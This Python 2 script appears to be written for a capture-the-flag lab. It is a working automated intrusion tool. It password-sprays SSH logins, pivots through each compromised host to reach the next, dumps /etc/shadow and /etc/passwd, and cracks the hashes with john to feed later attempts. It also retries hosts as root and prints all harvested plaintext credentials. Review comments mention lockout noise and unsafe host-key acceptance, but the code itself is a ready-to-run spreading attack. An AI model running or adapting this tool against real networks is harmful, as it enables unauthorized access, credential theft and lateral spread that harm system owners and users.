- #!/usr/bin/env python2
import os
import re
import subprocess
import sys
import tempfile

import paramiko
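# Usage: <script> <user> <password>
# The pair is a credential we already hold on the box this runs from; it seeds
# the spray lists below.  Fail with a usage line instead of an IndexError
# traceback when an argument is missing.
if len(sys.argv) < 3:
    sys.exit("usage: %s <user> <password>" % sys.argv[0])
current_user = sys.argv[1]
current_pass = sys.argv[2]

# host -> list of (user, password) pairs that logged in there.  "SELF" is the
# machine we start from.  Note this holds plaintext passwords and is dumped to
# stdout in the final summary.
creds = {"SELF": [(current_user, current_pass)]}

# Candidate usernames / passwords sprayed at every target; jack() appends to
# both as john cracks more.
users = [current_user]
passwords = [current_pass]

# One cracked entry in john's output: "<password> (<user>)".
# group(1) = password, group(2) = user -- jack() relies on that order.
credmatcher = re.compile(r'^(\S+)\s+\((\S+)\)$')

flag_org = {}        # host -> contents of /flag.txt found there
visited = []         # hosts we have logged into at least once
count_shadow = 0     # number of passwd/shadow dumps fed to jack()
count_ssh_key = 0    # never updated in this file
ip_tmp = []          # hosts already queued from a servers.txt (dedup)
ip = []              # work queue of (host, host-it-was-discovered-from)
revisit = []         # (host, from) pairs we got into as non-root; retried for root
conn = {}            # host -> (pivot transport or None, paramiko.SSHClient)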
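def tunnel_from_client(dest, user, pw, client=None):
    """Open a password-authenticated SSH session to *dest*, optionally via *client*.

    Args:
        dest:   target as "host:port"; the port defaults to 22 when omitted
                (previously a bare host raised IndexError, which the callers'
                broad ``except`` silently counted as a failed login).
        user:   username to authenticate as.
        pw:     password for *user* (password auth only, no key auth).
        client: an already-connected paramiko.SSHClient to pivot through.  When
                given, the new session rides a direct-tcpip channel on that
                client's transport, so the target only sees the pivot host.

    Returns:
        ``(transport, ssh_client)`` -- the pivot's transport (``None`` for a
        direct connection) and the connected client.  Callers store the pair
        in the global ``conn`` map.

    Raises:
        whatever paramiko raises on channel or connect failure (authentication
        errors, socket errors, ChannelException on a dead pivot).  On failure
        through a pivot the forwarded channel is closed before re-raising so
        each wrong guess does not leak a channel on the pivot.
    """
    paramiko.util.log_to_file("log.txt")
    host, _, port_text = dest.partition(":")
    port = int(port_text) if port_text else 22

    dest_client = paramiko.SSHClient()
    # NOTE(security): AutoAddPolicy accepts any host key presented.  Fine in a
    # closed lab; on a real network an attacker-in-the-middle impersonating the
    # target would simply be handed the password.  Use RejectPolicy plus a
    # pinned known_hosts outside the CTF.
    dest_client.set_missing_host_key_policy(paramiko.AutoAddPolicy())

    if client is None:
        dest_client.connect(host, port=port, username=user, password=pw)
        return None, dest_client

    trans = client.get_transport()
    # src_addr is only the originator we *claim* to the pivot's sshd; it does
    # not bind a local port, so the fixed value is harmless.
    ch = trans.open_channel("direct-tcpip",
                            src_addr=("127.0.0.1", 22),
                            dest_addr=(host, port))
    try:
        dest_client.connect(host, port=port, username=user, password=pw, sock=ch)
    except Exception:
        ch.close()
        raise
    return trans, dest_client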
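def jack(password, shadow):
    """Run john over a passwd/shadow pair and grow the global credential lists.

    Args:
        password: contents of /etc/passwd (written verbatim via ``str()``).
        shadow:   contents of /etc/shadow.

    Returns:
        True if at least one new user or password was appended to the global
        ``users`` / ``passwords`` lists, False otherwise (including on error,
        which is printed rather than raised).

    Side effects:
        increments ``count_shadow``.  The two dumps and the unshadow output are
        written into a private temp directory (``mkdtemp`` creates it mode
        0700) and removed in ``finally`` -- the first version left them in the
        working directory with default permissions and only deleted them on the
        success path.  NOTE(review): john normally keeps cracked results in its
        own pot file (~/.john); that is outside this cleanup.  The wordlist path
        ``rockyou.txt`` is still resolved against the current directory.
    """
    global users, passwords, count_shadow
    changed = False
    count_shadow += 1

    workdir = tempfile.mkdtemp(prefix="jack-")
    passwd_path = os.path.join(workdir, "password.txt")
    shadow_path = os.path.join(workdir, "shadow.txt")
    merged_path = os.path.join(workdir, "mypasswd")
    try:
        with open(passwd_path, "w") as fh:
            fh.write(str(password))
        with open(shadow_path, "w") as fh:
            fh.write(str(shadow))

        # Block until unshadow has finished: the original fired it off with
        # Popen() and never waited, so john could start on an empty or
        # half-written mypasswd.  argv list + explicit stdout, no shell.
        with open(merged_path, "w") as fh:
            subprocess.call(["unshadow", passwd_path, shadow_path], stdout=fh)

        john = subprocess.Popen(
            ["john", merged_path, "--wordlist=rockyou.txt"],
            stdout=subprocess.PIPE,
            universal_newlines=True,  # str lines under both python2 and 3
        )
        for line in john.stdout:
            m = credmatcher.match(line)
            if not m:
                continue
            cracked_pw, cracked_user = m.group(1), m.group(2)
            if cracked_user not in users:
                users.append(cracked_user)
                changed = True
            if cracked_pw not in passwords:
                passwords.append(cracked_pw)
                changed = True
        john.wait()
        return changed
    except Exception as e:
        exc_type, exc_obj, exc_tb = sys.exc_info()
        fname = os.path.split(exc_tb.tb_frame.f_code.co_filename)[1]
        print("%s %s %s: %s" % (exc_type, fname, exc_tb.tb_lineno, e))
        print("Cannot crack passwords")
        return changed
    finally:
        # Remove the hash dump whether or not john ran to completion.
        for path in (passwd_path, shadow_path, merged_path):
            try:
                os.remove(path)
            except OSError:
                pass
        try:
            os.rmdir(workdir)
        except OSError:
            pass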
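def crack(ip_addr, come_from):
    """Password-spray *ip_addr* with every known user/password combination.

    Args:
        ip_addr:   target as "host:port" (see tunnel_from_client).
        come_from: host whose live session in ``conn`` is used as the pivot,
                   or None to connect directly from this machine.

    Returns:
        the username of the first pair that logged in, or False when every
        combination failed.  On success the session is stored in ``conn``,
        the pair appended under ``creds[ip_addr]`` and the host added to
        ``visited`` (once).

    Notes:
        This attempts len(users) * len(passwords) logins per host.  On anything
        but a lab box that volume trips account-lockout policies and auth-log
        alerting.  Authentication failures are the expected outcome and stay
        quiet; any other exception (unroutable host, dead pivot, bad port) is
        printed, because it means the route rather than the password is wrong
        -- the first version swallowed both indistinguishably.
    """
    global conn, creds
    pivot = conn[come_from][1] if come_from in conn else None
    for u in users:
        for p in passwords:
            print("[*] Attempting login to " + ip_addr + " with " + u + "/" + p)
            try:
                tunnel, client = tunnel_from_client(ip_addr, u, p, pivot)
            except paramiko.AuthenticationException:
                continue  # wrong guess -- the normal case
            except Exception as e:
                print("[-] " + ip_addr + ": " + type(e).__name__ + ": " + str(e))
                continue
            creds.setdefault(ip_addr, []).append((u, p))
            conn[ip_addr] = (tunnel, client)
            if ip_addr not in visited:
                visited.append(ip_addr)
            print("[*] Login to " + ip_addr + " succeeded")
            return u
    return False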
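def _harvest_as_root(connection, host):
    """Harvest a freshly obtained root session on *host*.

    Reads ~/servers.txt (unseen hosts are queued on ``ip`` with *host* as
    their pivot and recorded in ``ip_tmp``), /flag.txt (stored in
    ``flag_org``) and /etc/passwd + /etc/shadow (handed to jack()).  Any
    exception propagates to the caller.
    """
    _, stdout, stderr = connection.exec_command("cat ~/servers.txt")
    listing = stdout.read()
    if listing:
        print("[*] Found servers file on " + host)
        new_hosts = listing.strip().split("\n")
        for candidate in new_hosts:
            if candidate not in ip_tmp:
                ip.append((candidate, host))
                ip_tmp.append(candidate)
        print("[+] Adding " + str(new_hosts) + " to global target queue")
    else:
        print("[*] Servers file not found on " + host)

    _, stdout, stderr = connection.exec_command("cat /flag.txt")
    flag = stdout.read()
    if flag:
        if host not in flag_org:
            print("[!] Flag file found on " + host + ", contents: \"" + flag + "\"")
            flag_org[host] = flag
        else:
            print("[!] Flag file had been found before on " + host)
    elif stderr.read():
        print("[*] No flag file found on " + host)

    # As root both files should be readable; jack() copes with empty input.
    _, stdout, stderr = connection.exec_command("cat /etc/shadow")
    shadow = stdout.read()
    _, stdout, stderr = connection.exec_command("cat /etc/passwd")
    passwd = stdout.read()
    jack(passwd, shadow)


def rerevisit():
    """Retry every host in ``revisit`` as root with the passwords known so far.

    ``revisit`` holds (host, from_host) pairs we already entered as a
    non-root user.  For each, "root" is tried with every password; on success
    the session goes into ``conn``, the pair into ``creds``, the host is
    harvested (see _harvest_as_root) and the entry is dropped from
    ``revisit`` at the end.

    Fixes relative to the first version: ``conn`` values are (tunnel, client)
    pairs, but the pivot lookup unpacked three items, so every pivoted root
    attempt raised ValueError and was silently skipped; and after a
    successful root login the loop kept trying the remaining passwords
    against the same host, which only adds failed-auth noise.

    Side effects: mutates ``conn``, ``creds``, ``ip``, ``ip_tmp``,
    ``flag_org``, ``revisit`` and, via jack(), ``users`` / ``passwords``.
    """
    cracked = []
    for ip_addr, from_where in revisit:
        if from_where:
            if from_where not in conn:
                print("[*] No live session to pivot host " + from_where + "; skipping " + ip_addr)
                continue
            pivot = conn[from_where][1]
        else:
            pivot = None
        for p in passwords:
            print("[*] *revisiting for root* Attempting login to " + ip_addr + " with root/" + p)
            try:
                tunnel, client = tunnel_from_client(ip_addr, "root", p, pivot)
            except Exception:
                continue  # wrong password, dead pivot, ... -> next password
            conn[ip_addr] = (tunnel, client)
            cracked.append((ip_addr, from_where))
            print("[*] Login to " + ip_addr + " succeeded")
            creds.setdefault(ip_addr, []).append(("root", p))
            try:
                _harvest_as_root(client, ip_addr)
            except Exception as e:
                exc_type, exc_obj, exc_tb = sys.exc_info()
                fname = os.path.split(exc_tb.tb_frame.f_code.co_filename)[1]
                print("ERRORRR %s %s %s: %s" % (exc_type, fname, exc_tb.tb_lineno, e))
            # root is in; the other passwords cannot do better for this host
            break
    for entry in cracked:
        revisit.remove(entry)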
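def _read_local(path):
    """Return the contents of the local file *path*, or "" if unreadable.

    Mirrors the old ``cat`` behaviour (EACCES on /etc/shadow when not root
    just yields nothing) without going through a shell.
    """
    try:
        with open(path) as fh:
            return fh.read()
    except (IOError, OSError):
        return ""


def _harvest_session(connection, host, user):
    """Harvest ~/servers.txt, /flag.txt and /etc/shadow over a new session.

    Unseen hosts from servers.txt are queued on ``ip`` with *host* as pivot;
    a flag goes into ``flag_org``.  Returns True if /etc/shadow was readable
    and handed to jack() together with /etc/passwd (the caller then re-runs
    the root sweep), False otherwise.
    """
    _, stdout, stderr = connection.exec_command("cat ~/servers.txt")
    listing = stdout.read()
    if listing:
        print("[*] Found servers file on " + host)
        new_hosts = listing.strip().split("\n")
        for candidate in new_hosts:
            if candidate not in ip_tmp:
                ip.append((candidate, host))
                ip_tmp.append(candidate)
        print("[+] Adding " + str(new_hosts) + " to global target queue")
    else:
        print("[*] Servers file not found on " + host)

    _, stdout, stderr = connection.exec_command("cat /flag.txt")
    flag = stdout.read()
    if flag:
        if host not in flag_org:
            print("[!] Flag file found on " + host + ", contents: \"" + flag + "\"")
            flag_org[host] = flag
        else:
            print("[!] Flag file had been found before on " + host)
    elif stderr.read():
        print("[*] No flag file found on " + host)

    _, stdout, stderr = connection.exec_command("cat /etc/shadow")
    shadow = stdout.read()
    if shadow:
        _, stdout, stderr = connection.exec_command("cat /etc/passwd")
        print("[*] Dumping /etc/shadow")
        jack(stdout.read(), shadow)
        return True
    if stderr.read():
        print("[*] User " + user + " on " + host + " cannot access /etc/shadow")
    return False


def main():
    """Breadth-first spread: pop a target, spray it, harvest it, repeat.

    Targets are seeded from ~/servers.txt and the local passwd/shadow is fed
    to jack() first.  Each popped host is attacked with crack(); on success
    it is harvested (non-root logins are also parked in ``revisit`` for the
    root sweep), on failure it is parked and only retried once the
    credential set has grown.

    Fixes relative to the first version of this loop:
    * the "nothing left" check ran *before* the freshly cracked host was
      harvested, and compared (host, from) tuples against bare host strings,
      so it fired exactly when the queue was empty -- with a single initial
      target the script exited without ever reading that host's servers.txt;
    * a host that failed every guess was re-queued unconditionally, so two
      uncrackable hosts spun the loop forever.  Credentials only ever grow,
      so retrying a parked host only after a change guarantees termination.
    """
    targets = _read_local(os.path.expanduser("~/servers.txt"))
    print("[*] Read targets file")
    for line in targets.strip().split("\n"):
        if line:  # an empty file used to queue "" as a host
            ip.append((line, None))

    # Seed users/passwords from our own box; shadow is empty unless root.
    jack(_read_local("/etc/passwd"), _read_local("/etc/shadow"))

    stalled = {}  # host -> (come_from, credential-set size at the failed attempt)
    while ip:
        current, come_from = ip.pop(0)
        u = crack(current, come_from)
        cred_size = (len(users), len(passwords))
        try:
            if u:
                if u != "root":
                    revisit.append((current, come_from))
                _, connection = conn[current]
                if _harvest_session(connection, current, u):
                    rerevisit()
            else:
                stalled[current] = (come_from, cred_size)
        except Exception as e:
            exc_type, exc_obj, exc_tb = sys.exc_info()
            fname = os.path.split(exc_tb.tb_frame.f_code.co_filename)[1]
            print("%s %s %s: %s" % (exc_type, fname, exc_tb.tb_lineno, e))

        # Put parked hosts back in line only when something new to try exists.
        now = (len(users), len(passwords))
        for host, (origin, seen) in list(stalled.items()):
            if seen != now:
                print("[*] " + host + " back in line")
                ip.append((host, origin))
                del stalled[host]

    print("\n\n==========")
    print("Collected " + str(count_shadow) + " /etc/shadow files")
    print("Cracked " + str(len(passwords)) + " Passwords")
    print("Found " + str(len(flag_org.keys())) + " flag files")
    # NOTE: this line prints every harvested password in the clear.
    print("Accessed following ips: " + str(creds))


if __name__ == "__main__":
    main()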